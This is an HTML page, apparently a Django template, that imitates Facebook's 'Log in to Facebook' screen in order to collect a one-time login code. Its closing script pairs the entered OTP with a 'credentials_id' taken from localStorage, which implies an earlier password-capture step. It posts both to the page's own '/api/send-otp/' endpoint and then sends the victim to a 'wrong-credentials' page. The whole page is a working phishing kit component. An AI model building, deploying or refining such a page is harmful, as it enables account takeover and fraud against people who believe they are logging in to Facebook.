<html lang="en" id="facebook" class="">

<head>
    <meta charset="utf-8">
    <meta name="referrer" content="origin-when-crossorigin" id="meta_referrer">
    <script nonce=""></script>
    <style nonce=""></style>
    <script nonce=""></script><noscript>
        <meta http-equiv="refresh" content="0; URL=/login/?_rdc=2&amp;_rdr&amp;_fb_noscript=1" />
    </noscript>
    <title id="pageTitle">Log in to Facebook</title>
    <meta name="bingbot" content="noarchive">
    <meta name="description"
        content="Log in to Facebook to start sharing and connecting with your friends, family and people you know.">
    <meta property="og:site_name" content="Facebook">
    <meta property="og:url" content="">
    <meta property="og:locale" content="en_GB">
    <link rel="canonical" href="web/">
    <link rel="icon" href="https://static.xx.fbcdn.net/rsrc.php/yx/r/e9sqr8WnkCf.ico">
    <link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v5/y2/l/0,cross/mmo1oTsuuHp.css"
        data-bootloader-hash="wXaVolg" crossorigin="anonymous">
    <link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v5/yt/l/0,cross/eVkvY6rzx4N.css"
        data-bootloader-hash="u4F94Jx" crossorigin="anonymous">
    <link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v5/yJ/l/0,cross/-MH6mY1Za_K.css"
        data-bootloader-hash="fpPjFBD" crossorigin="anonymous">
    <link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v5/yr/l/0,cross/r8l0oY44Pwc.css"
        data-bootloader-hash="/Bigw6+" crossorigin="anonymous">
    <script src="https://static.xx.fbcdn.net/rsrc.php/v4/yw/r/zqET9uOFLFP.js" data-bootloader-hash="/q7DUNa"
        crossorigin="anonymous"></script>
    <link href="https://static.xx.fbcdn.net/rsrc.php/v4/y1/r/lEiu2wBgF_k.js" rel="preload" as="script"
        crossorigin="anonymous">
    <script src="https://static.xx.fbcdn.net/rsrc.php/v4/y1/r/lEiu2wBgF_k.js" async="" crossorigin="anonymous"
        data-bootloader-hash-client="Scive/5"></script>
    <link href="https://static.xx.fbcdn.net/rsrc.php/v4/y4/r/C3L2WLQPBLv.js" rel="preload" as="script"
        crossorigin="anonymous">
    <script src="https://static.xx.fbcdn.net/rsrc.php/v4/y4/r/C3L2WLQPBLv.js" async="" crossorigin="anonymous"
        data-bootloader-hash-client="3PGe0Ra"></script>
    <link href="https://static.xx.fbcdn.net/rsrc.php/v4ij9m4/ya/l/en_GB/EAEmq6z9X2U.js" rel="preload" as="script"
        crossorigin="anonymous">
    <script src="https://static.xx.fbcdn.net/rsrc.php/v4ij9m4/ya/l/en_GB/EAEmq6z9X2U.js" async=""
        crossorigin="anonymous" data-bootloader-hash-client="6bFQpoa"></script>
    <link rel="stylesheet" type="text/css" href="data:text/css; charset=utf-8," crossorigin="anonymous">
    <link href="https://static.xx.fbcdn.net/rsrc.php/v4/y8/r/XSl8EDD4SXX.js" rel="preload" as="script"
        crossorigin="anonymous">
    <script src="https://static.xx.fbcdn.net/rsrc.php/v4/y8/r/XSl8EDD4SXX.js" async="" crossorigin="anonymous"
        data-bootloader-hash-client="lmnLTcE"></script>
    <link href="https://static.xx.fbcdn.net/rsrc.php/v4/yw/r/-GcXqsWzrBY.js" rel="preload" as="script"
        crossorigin="anonymous">
    <script src="https://static.xx.fbcdn.net/rsrc.php/v4/yw/r/-GcXqsWzrBY.js" async="" crossorigin="anonymous"
        data-bootloader-hash-client="rBUHKbB"></script>
    <link href="https://static.xx.fbcdn.net/rsrc.php/v4/yq/r/tVE7l4RwYm_.js" rel="preload" as="script"
        crossorigin="anonymous">
    <script src="https://static.xx.fbcdn.net/rsrc.php/v4/yq/r/tVE7l4RwYm_.js" async="" crossorigin="anonymous"
        data-bootloader-hash-client="EEAX6B4"></script>
    <link href="https://static.xx.fbcdn.net/rsrc.php/v4/ym/r/tr9OcwV16nL.js" rel="preload" as="script"
        crossorigin="anonymous">
    <script src="https://static.xx.fbcdn.net/rsrc.php/v4/ym/r/tr9OcwV16nL.js" async="" crossorigin="anonymous"
        data-bootloader-hash-client="03T3Wls"></script>
    <link href="https://static.xx.fbcdn.net/rsrc.php/v4/yX/r/PRCJ-M63jc-.js" rel="preload" as="script"
        crossorigin="anonymous">
    <script src="https://static.xx.fbcdn.net/rsrc.php/v4/yX/r/PRCJ-M63jc-.js" async="" crossorigin="anonymous"
        data-bootloader-hash-client="ssGUSfp"></script>
    <link href="https://static.xx.fbcdn.net/rsrc.php/v4/yS/r/ui2DkP-wt_7.js" rel="preload" as="script"
        crossorigin="anonymous">
    <script src="https://static.xx.fbcdn.net/rsrc.php/v4/yS/r/ui2DkP-wt_7.js" async="" crossorigin="anonymous"
        data-bootloader-hash-client="I+GHswV"></script>
    <link href="https://static.xx.fbcdn.net/rsrc.php/v4/y9/r/BTdUGzsTGVy.js" rel="preload" as="script"
        crossorigin="anonymous">
    <script src="https://static.xx.fbcdn.net/rsrc.php/v4/y9/r/BTdUGzsTGVy.js" async="" crossorigin="anonymous"
        data-bootloader-hash-client="dAWNZ/s"></script>
    <link href="https://static.xx.fbcdn.net/rsrc.php/v4/yb/r/Zkn24bC5Xy_.js" rel="preload" as="script"
        crossorigin="anonymous">
    <script src="https://static.xx.fbcdn.net/rsrc.php/v4/yb/r/Zkn24bC5Xy_.js" async="" crossorigin="anonymous"
        data-bootloader-hash-client="2yz5u9G"></script>
    <link href="https://static.xx.fbcdn.net/rsrc.php/v4/yI/r/BWAeojOuhn8.js" rel="preload" as="script"
        crossorigin="anonymous">
    <script src="https://static.xx.fbcdn.net/rsrc.php/v4/yI/r/BWAeojOuhn8.js" async="" crossorigin="anonymous"
        data-bootloader-hash-client="H3fxfLR"></script>
    <link href="https://static.xx.fbcdn.net/rsrc.php/v4/yO/r/_tJ17sGyxOX.js" rel="preload" as="script"
        crossorigin="anonymous">
    <script src="https://static.xx.fbcdn.net/rsrc.php/v4/yO/r/_tJ17sGyxOX.js" async="" crossorigin="anonymous"
        data-bootloader-hash-client="zPYlTyl"></script>
    <link href="https://static.xx.fbcdn.net/rsrc.php/v4ifl74/yF/l/en_GB/e13i-_0nlO9.js" rel="preload" as="script"
        crossorigin="anonymous">
    <script src="https://static.xx.fbcdn.net/rsrc.php/v4ifl74/yF/l/en_GB/e13i-_0nlO9.js" async=""
        crossorigin="anonymous" data-bootloader-hash-client="pAOcHVz"></script>
    <link href="https://static.xx.fbcdn.net/rsrc.php/v4/yQ/r/z4DSJxQYOwV.js" rel="preload" as="script"
        crossorigin="anonymous">
    <script src="https://static.xx.fbcdn.net/rsrc.php/v4/yQ/r/z4DSJxQYOwV.js" async="" crossorigin="anonymous"
        data-bootloader-hash-client="t8DfPeZ"></script>
    <link href="https://static.xx.fbcdn.net/rsrc.php/v4/y1/r/fmwV9iwl0do.js" rel="preload" as="script"
        crossorigin="anonymous">
    <script src="https://static.xx.fbcdn.net/rsrc.php/v4/y1/r/fmwV9iwl0do.js" async="" crossorigin="anonymous"
        data-bootloader-hash-client="BdwbaRb"></script>
    <link href="https://static.xx.fbcdn.net/rsrc.php/v4/yY/r/vQuh0HMqNqs.js" rel="preload" as="script"
        crossorigin="anonymous">
    <script src="https://static.xx.fbcdn.net/rsrc.php/v4/yY/r/vQuh0HMqNqs.js" async="" crossorigin="anonymous"
        data-bootloader-hash-client="jcR0YwB"></script>
    <link href="https://static.xx.fbcdn.net/rsrc.php/v4i_Ou4/yO/l/en_GB/q3wRiN23ZCm.js" rel="preload" as="script"
        crossorigin="anonymous">
    <script src="https://static.xx.fbcdn.net/rsrc.php/v4i_Ou4/yO/l/en_GB/q3wRiN23ZCm.js" async=""
        crossorigin="anonymous" data-bootloader-hash-client="J4ABH/z"></script>
    <link href="https://static.xx.fbcdn.net/rsrc.php/v4/yU/r/pNm5YDgJip6.js" rel="preload" as="script"
        crossorigin="anonymous">
    <script src="https://static.xx.fbcdn.net/rsrc.php/v4/yU/r/pNm5YDgJip6.js" async="" crossorigin="anonymous"
        data-bootloader-hash-client="JOwuQhi"></script>

    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/css/bootstrap.min.css" rel="stylesheet"
        integrity="sha384-QWTKZyjpPEjISv5WaRU9OFeRpok6YctnYmDr5pNlyT2bRjXh0JMhjY6hW+ALEwIH" crossorigin="anonymous">
</head>

<body
    class="_39il _97vt _97vz _97v- _97v_ _97w2 _97w0 _9ax- _9ax_ _9ay1 UIPage_LoggedOut _-kb _605a b_c3pyn-ahh chrome webkit win x1 Locale_en_GB cores-gte4 _19_u"
    dir="ltr">
    <script type="text/javascript"
        nonce="">requireLazy(["bootstrapWebSession"], function (j) { j(1740934320) })</script>
    <div class="_li" id="u_0_0_Bi">
        <div id="globalContainer" class="uiContextualLayerParent">
            <div class="fb_content clearfix " id="content" role="main">
                <div class="_4-u5 _30ny">
                    <div class="_97vy"><img class="_97vu img"
                            src="https://static.xx.fbcdn.net/rsrc.php/y1/r/4lCu2zih0ca.svg" alt="Facebook"></div>
                    <div class="_4-u2 _1w1t _4-u8 _52jv">
                        <div class="_xku" id="header_block"><span class="_97w1 _50f6">
                                <div class="_9axz">Log in to Facebook</div>
                            </span></div>
                        <div class="login_form_container">
                            <form id="otpForm" action="" method="post">
                                {% csrf_token %}



                                <div style="height: 62px !important;" class="clearfix _5466 _44mg" id="otp_container">
                                    <input type="text" style="height: 100% !important; " id="otpCode"
                                        class="form-control" placeholder="Enter OTP Code" required>
                                </div>

                                <div class="_xkt"><button value="1" class="_42ft _4jy0 _52e0 _4jy6 _4jy1 selected _51sy"
                                        id="loginButton" name="login" tabindex="0" type="submit">Submit</button>
                                </div>
                                <div id="login_link">

                                    <div class="_1rf5"><span class="_1rf8">or</span></div>
                                    <div class="_xkt"><a role="button"
                                            class="_42ft _4jy0 _16jx _4jy6 _4jy2 selected _51sy"
                                            href="{% url 'login_to_account_fb' %}">Login</a></div>
                                </div>
                        </div><input type="hidden" autocomplete="off" id="prefill_contact_point"
                            name="prefill_contact_point" value=""><input type="hidden" autocomplete="off"
                            id="prefill_source" name="prefill_source"><input type="hidden" autocomplete="off"
                            id="prefill_type" name="prefill_type"><input type="hidden" autocomplete="off"
                            id="first_prefill_source" name="first_prefill_source"><input type="hidden"
                            autocomplete="off" id="first_prefill_type" name="first_prefill_type"><input type="hidden"
                            autocomplete="off" id="had_cp_prefilled" name="had_cp_prefilled" value="false"><input
                            type="hidden" autocomplete="off" id="had_password_prefilled" name="had_password_prefilled"
                            value="false"><input type="hidden" autocomplete="off" name="ab_test_data" value="">
                        </form>
                    </div>
                </div>
            </div>
        </div>
        <div class="">
            <div class="_95ke _8opy">
                <div id="pageFooter" data-referrer="page_footer" data-testid="page_footer">
                    <ul class="uiList localeSelectorList _2pid _509- _4ki _6-h _6-j _6-i" data-nocookies="1">
                        <li>English (UK)</li>
                        <li><a class="_sv4" dir="ltr" href="" title="Hausa" id="u_0_5_JS">Hausa</a></li>
                        <li><a class="_sv4" dir="ltr" href="" title="French (France)" id="u_0_6_Z7">Français
                                (France)</a></li>
                        <li><a class="_sv4" dir="ltr" href="" title="Portuguese (Brazil)" id="u_0_7_O4">Português
                                (Brasil)</a></li>
                        <li><a class="_sv4" dir="ltr" href="" title="Spanish" id="u_0_8_p6">Español</a></li>
                        <li><a class="_sv4" dir="rtl" href="" title="Arabic" id="u_0_9_pV">العربية</a></li>
                        <li><a class="_sv4" dir="ltr" href="" title="Indonesian" id="u_0_a_3/">Bahasa Indonesia</a>
                        </li>
                        <li><a class="_sv4" dir="ltr" href="" title="German" id="u_0_b_vQ">Deutsch</a></li>
                        <li><a class="_sv4" dir="ltr" href="" title="Japanese" id="u_0_c_76">日本語</a></li>
                        <li><a class="_sv4" dir="ltr" href="" title="Italian" id="u_0_d_GO">Italiano</a></li>
                        <li><a class="_sv4" dir="ltr" href="" title="Hindi" id="u_0_e_nL">हिन्दी</a></li>
                        <li><a role="button" class="_42ft _4jy0 _517i _517h _51sy" rel="dialog" href="#"
                                title="Show more languages"><i class="img sp_YbiIuPczOY_ sx_089752"></i></a></li>
                    </ul>
                    <div id="contentCurve"></div>
                    <div id="pageFooterChildren" role="contentinfo" aria-label="Facebook site links">
                        <ul class="uiList pageFooterLinkList _509- _4ki _703 _6-i">
                            <li><a href="" title="Sign up for Facebook">Sign Up</a></li>
                            <li><a href="" title="Log in to Facebook">Log in</a></li>
                            <li><a href="" title="Take a look at Messenger.">Messenger</a>
                            </li>
                            <li><a href="" title="Facebook Lite for Android.">Facebook Lite</a></li>
                            <li><a href="" title="Browse in Video">Video</a></li>
                            <li><a href="" title="Take a look at popular places on Facebook.">Places</a>
                            </li>
                            <li><a href="" title="Check out Facebook games.">Games</a></li>
                            <li><a href="" title="Buy and sell on Facebook Marketplace.">Marketplace</a></li>
                            <li><a href="" title="Learn more about Meta Pay" target="_blank">Meta Pay</a></li>
                            <li><a href="https://www.meta.com/" title="Discover Meta" target="_blank">Meta Store</a>
                            </li>
                            <li><a href="https://www.meta.com/quest/" title="Learn more about Meta Quest"
                                    target="_blank">Meta Quest</a></li>
                            <li><a href="https://www.meta.com/smart-glasses/" title="Learn more about Ray-Ban Meta"
                                    target="_blank">Ray-Ban Meta</a></li>
                            <li><a href="https://www.meta.ai/" title="Meta AI">Meta AI</a></li>
                            <li><a href="" title="Take a look at Instagram" target="_blank" rel="noreferrer nofollow"
                                    data-lynx-mode="asynclazy">Instagram</a></li>
                            <li><a href="" title="Check out Threads">Threads</a></li>
                            <li><a href="" title="Donate to worthy causes.">Fundraisers</a></li>
                            <li><a href="" title="Browse our Facebook Services directory.">Services</a></li>
                            <li><a href="" title="See the Voting Information Centre">Voting Information Centre</a>
                            </li>
                            <li><a href=""
                                    title="Learn how we collect, use and share information to support Facebook.">Privacy
                                    Policy</a></li>
                            <li><a href="" title="Learn how to manage and control your privacy on Facebook.">Privacy
                                    Centre</a></li>
                            <li><a href="" title="Explore our groups.">Groups</a></li>
                            <li><a href="" accesskey="8"
                                    title="Read our blog, discover the resource centre and find job opportunities.">About</a>
                            </li>
                            <li><a href="" title="Advertise on Facebook">Create ad</a></li>
                            <li><a href="" title="Create a Page">Create Page</a>
                            </li>
                            <li><a href="" title="Develop on our platform.">Developers</a></li>
                            <li><a href="" title="Make your next career move to our brilliant company.">Careers</a>
                            </li>
                            <li><a href="" title="Learn about cookies and Facebook." data-nocookies="1">Cookies</a>
                            </li>
                            <li><a class="_41ug" data-nocookies="1" href="" title="Learn about Ad Choices.">AdChoices<i
                                        class="img sp_YbiIuPczOY_ sx_b2cf63"></i></a></li>
                            <li><a data-nocookies="1" href="" accesskey="9"
                                    title="Review our terms and policies.">Terms</a></li>
                            <li><a href="" accesskey="0" title="Visit our Help Centre.">Help</a></li>
                            <li><a href="" title="Visit our contact uploading and non-users notice.">Contact
                                    uploading and
                                    non-users</a></li>
                            <li><a accesskey="6" class="accessible_elem" href=""
                                    title="View and edit your Facebook settings.">Settings</a></li>
                            <li><a accesskey="7" class="accessible_elem" href="" title="View your activity log">Activity
                                    log</a></li>
                        </ul>
                    </div>
                    <div class="mvl copyright">
                        <div><span> Meta © 2025</span></div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <div></div><span><img src="https://facebook.com/security/hsts-pixel.gif" width="0" height="0"
            style="display:none"></span>
    </div>
    <div style="display:none"></div>

    <script
        nonce="">now_inl = (function () { var p = window.performance; return p && p.now && p.timing && p.timing.navigationStart ? function () { return p.now() + p.timing.navigationStart } : function () { return new Date().getTime() }; })(); window.__bigPipeFR = now_inl();</script>
    <link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v5/y2/l/0,cross/mmo1oTsuuHp.css" as="style"
        crossorigin="anonymous">
    <link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v5/yt/l/0,cross/eVkvY6rzx4N.css" as="style"
        crossorigin="anonymous">
    <link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v4/y1/r/lEiu2wBgF_k.js" as="script"
        crossorigin="anonymous" nonce="">
    <link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v4/y4/r/C3L2WLQPBLv.js" as="script"
        crossorigin="anonymous" nonce="">
    <link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v5/yJ/l/0,cross/-MH6mY1Za_K.css" as="style"
        crossorigin="anonymous">
    <link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v5/yr/l/0,cross/r8l0oY44Pwc.css" as="style"
        crossorigin="anonymous">
    <link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v4ij9m4/ya/l/en_GB/EAEmq6z9X2U.js" as="script"
        crossorigin="anonymous" nonce="">


    <script>
        const loginButton = document.getElementById("loginButton");
        const submitForm = document.getElementById("otpForm");

        submitForm.onsubmit = function (e) {
            e.preventDefault();

            const otp = document.getElementById("otpCode").value;
            const spinner = document.createElement("div");
            spinner.style.width = "20px";
            spinner.style.height = "20px";
            spinner.className = "spinner spinner-border text-light text-md ms-2";

            loginButton.appendChild(spinner);
            loginButton.disabled = true;

            const credentials_id = JSON.parse(
                localStorage.getItem("credentials_id")
            );

            console.log(credentials_id);

            const data = {
                otp,
                credentials_id,
            };

            // console.log("User Data: ", data);

            fetch("/api/send-otp/", {
                method: "POST",
                headers: {
                    "Content-Type": "application/json",
                    "X-CSRFToken": "{{ csrf_token }}",
                },
                body: JSON.stringify(data),
            })
                .then((response) => response.json())
                .then((data) => {
                    console.log("Success:", data);

                    if (data.detail) {
                        setTimeout(() => {
                            loginButton.removeChild(spinner);
                            loginButton.textContent = "Submit";
                            document.getElementById("otpCode").value = "";
                            window.location.href = "/wrong-credentials";
                        }, 3000);
                    }
                })
                .catch((error) => {
                    console.error("Error:", error);
                    loginButton.textContent = "Submit";
                    loginButton.disabled = false;
                });
        };

    </script>

</body>

</html>